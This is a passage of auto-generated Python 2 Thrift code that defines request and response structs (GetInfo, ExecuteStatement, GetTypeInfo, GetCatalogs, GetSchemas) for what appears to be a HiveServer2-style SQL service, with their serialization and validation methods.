      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetInfoValue(object):
  """Thrift struct: holder for a GetInfo result value in one of several typed
  representations (generated union-style — callers set one member; nothing here
  enforces exclusivity, and validate() requires no field).

  Attributes:
   - stringValue
   - smallIntValue
   - integerBitmask
   - integerFlag
   - binaryValue
   - lenValue
  """
  # (field id, thrift type, name, type args, default), indexed by field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'stringValue', None, None, ), # 1
    (2, TType.I16, 'smallIntValue', None, None, ), # 2
    (3, TType.I32, 'integerBitmask', None, None, ), # 3
    (4, TType.I32, 'integerFlag', None, None, ), # 4
    (5, TType.I32, 'binaryValue', None, None, ), # 5
    (6, TType.I64, 'lenValue', None, None, ), # 6
  )
  def __init__(self, stringValue=None, smallIntValue=None, integerBitmask=None, integerFlag=None, binaryValue=None, lenValue=None,):
    self.stringValue = stringValue
    self.smallIntValue = smallIntValue
    self.integerBitmask = integerBitmask
    self.integerFlag = integerFlag
    self.binaryValue = binaryValue
    self.lenValue = lenValue
  def read(self, iprot):
    """Deserialize this struct from *iprot*; uses the accelerated C decoder when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.stringValue = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I16:
          self.smallIntValue = iprot.readI16();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.I32:
          self.integerBitmask = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.I32:
          self.integerFlag = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 5:
        if ftype == TType.I32:
          self.binaryValue = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 6:
        if ftype == TType.I64:
          self.lenValue = iprot.readI64();
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; every non-None member is written."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetInfoValue')
    if self.stringValue is not None:
      oprot.writeFieldBegin('stringValue', TType.STRING, 1)
      oprot.writeString(self.stringValue)
      oprot.writeFieldEnd()
    if self.smallIntValue is not None:
      oprot.writeFieldBegin('smallIntValue', TType.I16, 2)
      oprot.writeI16(self.smallIntValue)
      oprot.writeFieldEnd()
    if self.integerBitmask is not None:
      oprot.writeFieldBegin('integerBitmask', TType.I32, 3)
      oprot.writeI32(self.integerBitmask)
      oprot.writeFieldEnd()
    if self.integerFlag is not None:
      oprot.writeFieldBegin('integerFlag', TType.I32, 4)
      oprot.writeI32(self.integerFlag)
      oprot.writeFieldEnd()
    if self.binaryValue is not None:
      oprot.writeFieldBegin('binaryValue', TType.I32, 5)
      oprot.writeI32(self.binaryValue)
      oprot.writeFieldEnd()
    if self.lenValue is not None:
      oprot.writeFieldBegin('lenValue', TType.I64, 6)
      oprot.writeI64(self.lenValue)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """No required fields; always succeeds."""
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetInfoReq(object):
  """Thrift struct: request for a piece of server metadata identified by infoType.

  Attributes:
   - sessionHandle
   - infoType
  """
  # (field id, thrift type, name, type args, default), indexed by field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
    (2, TType.I32, 'infoType', None, None, ), # 2
  )
  def __init__(self, sessionHandle=None, infoType=None,):
    self.sessionHandle = sessionHandle
    self.infoType = infoType
  def read(self, iprot):
    """Deserialize this struct from *iprot*; uses the accelerated C decoder when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.sessionHandle = TSessionHandle()
          self.sessionHandle.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I32:
          self.infoType = iprot.readI32();
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; uses the accelerated C encoder when available."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetInfoReq')
    if self.sessionHandle is not None:
      oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
      self.sessionHandle.write(oprot)
      oprot.writeFieldEnd()
    if self.infoType is not None:
      oprot.writeFieldBegin('infoType', TType.I32, 2)
      oprot.writeI32(self.infoType)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if a required field is unset."""
    if self.sessionHandle is None:
      raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
    if self.infoType is None:
      raise TProtocol.TProtocolException(message='Required field infoType is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetInfoResp(object):
  """Thrift struct: response to GetInfo — status plus the requested info value.

  Attributes:
   - status
   - infoValue
  """
  # (field id, thrift type, name, type args, default), indexed by field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
    (2, TType.STRUCT, 'infoValue', (TGetInfoValue, TGetInfoValue.thrift_spec), None, ), # 2
  )
  def __init__(self, status=None, infoValue=None,):
    self.status = status
    self.infoValue = infoValue
  def read(self, iprot):
    """Deserialize this struct from *iprot*; uses the accelerated C decoder when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.status = TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.infoValue = TGetInfoValue()
          self.infoValue.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; uses the accelerated C encoder when available."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetInfoResp')
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 1)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    if self.infoValue is not None:
      oprot.writeFieldBegin('infoValue', TType.STRUCT, 2)
      self.infoValue.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if a required field is unset."""
    if self.status is None:
      raise TProtocol.TProtocolException(message='Required field status is unset!')
    if self.infoValue is None:
      raise TProtocol.TProtocolException(message='Required field infoValue is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TExecuteStatementReq(object):
  """Thrift struct: request to execute a statement within a session, with an
  optional per-query configuration overlay and an asynchronous-execution flag.

  Attributes:
   - sessionHandle
   - statement
   - confOverlay
   - runAsync
  """
  # (field id, thrift type, name, type args, default), indexed by field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
    (2, TType.STRING, 'statement', None, None, ), # 2
    (3, TType.MAP, 'confOverlay', (TType.STRING,None,TType.STRING,None), None, ), # 3
    (4, TType.BOOL, 'runAsync', None, False, ), # 4
  )
  # runAsync defaults to the IDL default stored in thrift_spec (field 4 -> False).
  def __init__(self, sessionHandle=None, statement=None, confOverlay=None, runAsync=thrift_spec[4][4],):
    self.sessionHandle = sessionHandle
    self.statement = statement
    self.confOverlay = confOverlay
    self.runAsync = runAsync
  def read(self, iprot):
    """Deserialize this struct from *iprot*; uses the accelerated C decoder when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.sessionHandle = TSessionHandle()
          self.sessionHandle.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.statement = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.MAP:
          self.confOverlay = {}
          (_ktype128, _vtype129, _size127 ) = iprot.readMapBegin()
          for _i131 in xrange(_size127):
            _key132 = iprot.readString();
            _val133 = iprot.readString();
            self.confOverlay[_key132] = _val133
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.BOOL:
          self.runAsync = iprot.readBool();
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; uses the accelerated C encoder when available."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TExecuteStatementReq')
    if self.sessionHandle is not None:
      oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
      self.sessionHandle.write(oprot)
      oprot.writeFieldEnd()
    if self.statement is not None:
      oprot.writeFieldBegin('statement', TType.STRING, 2)
      oprot.writeString(self.statement)
      oprot.writeFieldEnd()
    if self.confOverlay is not None:
      oprot.writeFieldBegin('confOverlay', TType.MAP, 3)
      oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.confOverlay))
      for kiter134,viter135 in self.confOverlay.items():
        oprot.writeString(kiter134)
        oprot.writeString(viter135)
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    if self.runAsync is not None:
      oprot.writeFieldBegin('runAsync', TType.BOOL, 4)
      oprot.writeBool(self.runAsync)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if a required field is unset."""
    if self.sessionHandle is None:
      raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
    if self.statement is None:
      raise TProtocol.TProtocolException(message='Required field statement is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TExecuteStatementResp(object):
  """Thrift struct: response to ExecuteStatement — status plus an operation handle
  for tracking/fetching results (handle may be absent on failure).

  Attributes:
   - status
   - operationHandle
  """
  # (field id, thrift type, name, type args, default), indexed by field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
    (2, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 2
  )
  def __init__(self, status=None, operationHandle=None,):
    self.status = status
    self.operationHandle = operationHandle
  def read(self, iprot):
    """Deserialize this struct from *iprot*; uses the accelerated C decoder when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.status = TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.operationHandle = TOperationHandle()
          self.operationHandle.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; uses the accelerated C encoder when available."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TExecuteStatementResp')
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 1)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    if self.operationHandle is not None:
      oprot.writeFieldBegin('operationHandle', TType.STRUCT, 2)
      self.operationHandle.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if a required field is unset (operationHandle is optional)."""
    if self.status is None:
      raise TProtocol.TProtocolException(message='Required field status is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetTypeInfoReq(object):
  """Thrift struct: request for supported-type metadata within a session.

  Attributes:
   - sessionHandle
  """
  # (field id, thrift type, name, type args, default), indexed by field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
  )
  def __init__(self, sessionHandle=None,):
    self.sessionHandle = sessionHandle
  def read(self, iprot):
    """Deserialize this struct from *iprot*; uses the accelerated C decoder when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.sessionHandle = TSessionHandle()
          self.sessionHandle.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; uses the accelerated C encoder when available."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetTypeInfoReq')
    if self.sessionHandle is not None:
      oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
      self.sessionHandle.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if a required field is unset."""
    if self.sessionHandle is None:
      raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetTypeInfoResp(object):
  """Thrift struct: response to GetTypeInfo — status plus an operation handle
  for fetching the type-info result set (handle may be absent on failure).

  Attributes:
   - status
   - operationHandle
  """
  # (field id, thrift type, name, type args, default), indexed by field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
    (2, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 2
  )
  def __init__(self, status=None, operationHandle=None,):
    self.status = status
    self.operationHandle = operationHandle
  def read(self, iprot):
    """Deserialize this struct from *iprot*; uses the accelerated C decoder when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.status = TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.operationHandle = TOperationHandle()
          self.operationHandle.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; uses the accelerated C encoder when available."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetTypeInfoResp')
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 1)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    if self.operationHandle is not None:
      oprot.writeFieldBegin('operationHandle', TType.STRUCT, 2)
      self.operationHandle.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if a required field is unset (operationHandle is optional)."""
    if self.status is None:
      raise TProtocol.TProtocolException(message='Required field status is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetCatalogsReq(object):
  """Thrift request struct for the GetCatalogs call.

  Attributes:
   - sessionHandle: TSessionHandle of the issuing session (required).
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
  )
  def __init__(self, sessionHandle=None,):
    self.sessionHandle = sessionHandle
  def read(self, iprot):
    """Populate this struct from the input protocol *iprot*."""
    # Fast path: fastbinary C extension decodes the struct in one call.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Generic path: walk fields until STOP; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.sessionHandle = TSessionHandle()
          self.sessionHandle.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    # Fast path: encode via the C extension.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetCatalogsReq')
    if self.sessionHandle is not None:
      oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
      self.sessionHandle.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if the required sessionHandle field is unset."""
    if self.sessionHandle is None:
      raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    # Value-style equality: compare by field contents, not identity.
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetCatalogsResp(object):
  """Thrift response struct for the GetCatalogs call.

  Attributes:
   - status: TStatus of the call (required; enforced by validate()).
   - operationHandle: TOperationHandle for the result, or None.
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
    (2, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 2
  )
  def __init__(self, status=None, operationHandle=None,):
    self.status = status
    self.operationHandle = operationHandle
  def read(self, iprot):
    """Populate this struct from the input protocol *iprot*."""
    # Fast path: fastbinary C extension decodes the struct in one call.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Generic path: walk fields until STOP; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.status = TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.operationHandle = TOperationHandle()
          self.operationHandle.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    # Fast path: encode via the C extension.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetCatalogsResp')
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 1)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    if self.operationHandle is not None:
      oprot.writeFieldBegin('operationHandle', TType.STRUCT, 2)
      self.operationHandle.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if the required status field is unset."""
    if self.status is None:
      raise TProtocol.TProtocolException(message='Required field status is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    # Value-style equality: compare by field contents, not identity.
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetSchemasReq(object):
  """Thrift request struct for the GetSchemas call.

  Attributes:
   - sessionHandle: TSessionHandle of the issuing session (required).
   - catalogName: catalog filter string, or None for no filter.
   - schemaName: schema filter string, or None for no filter.
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
    (2, TType.STRING, 'catalogName', None, None, ), # 2
    (3, TType.STRING, 'schemaName', None, None, ), # 3
  )
  def __init__(self, sessionHandle=None, catalogName=None, schemaName=None,):
    self.sessionHandle = sessionHandle
    self.catalogName = catalogName
    self.schemaName = schemaName
  def read(self, iprot):
    """Populate this struct from the input protocol *iprot*."""
    # Fast path: fastbinary C extension decodes the struct in one call.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Generic path: walk fields until STOP; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.sessionHandle = TSessionHandle()
          self.sessionHandle.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.catalogName = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRING:
          self.schemaName = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    # Fast path: encode via the C extension.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TGetSchemasReq')
    if self.sessionHandle is not None:
      oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
      self.sessionHandle.write(oprot)
      oprot.writeFieldEnd()
    if self.catalogName is not None:
      oprot.writeFieldBegin('catalogName', TType.STRING, 2)
      oprot.writeString(self.catalogName)
      oprot.writeFieldEnd()
    if self.schemaName is not None:
      oprot.writeFieldBegin('schemaName', TType.STRING, 3)
      oprot.writeString(self.schemaName)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if the required sessionHandle field is unset."""
    if self.sessionHandle is None:
      raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    # Value-style equality: compare by field contents, not identity.
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TGetSchemasResp(object):
  """Thrift response struct for the GetSchemas call.

  Attributes:
   - status: TStatus of the call (required; enforced by validate()).
   - operationHandle: TOperationHandle for the result, or None.
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
    (2, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ), # 2
  )
  def __init__(self, status=None, operationHandle=None,):
    self.status = status
    self.operationHandle = operationHandle
  def read(self, iprot):
    """Populate this struct from the input protocol *iprot*."""
    # Fast path: fastbinary C extension decodes the struct in one call.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Generic path: walk fields until STOP; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.status = TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.operationHandle = TOperationHandle()
          self.operationHandle.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    # Fast path: encode via the C extension.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
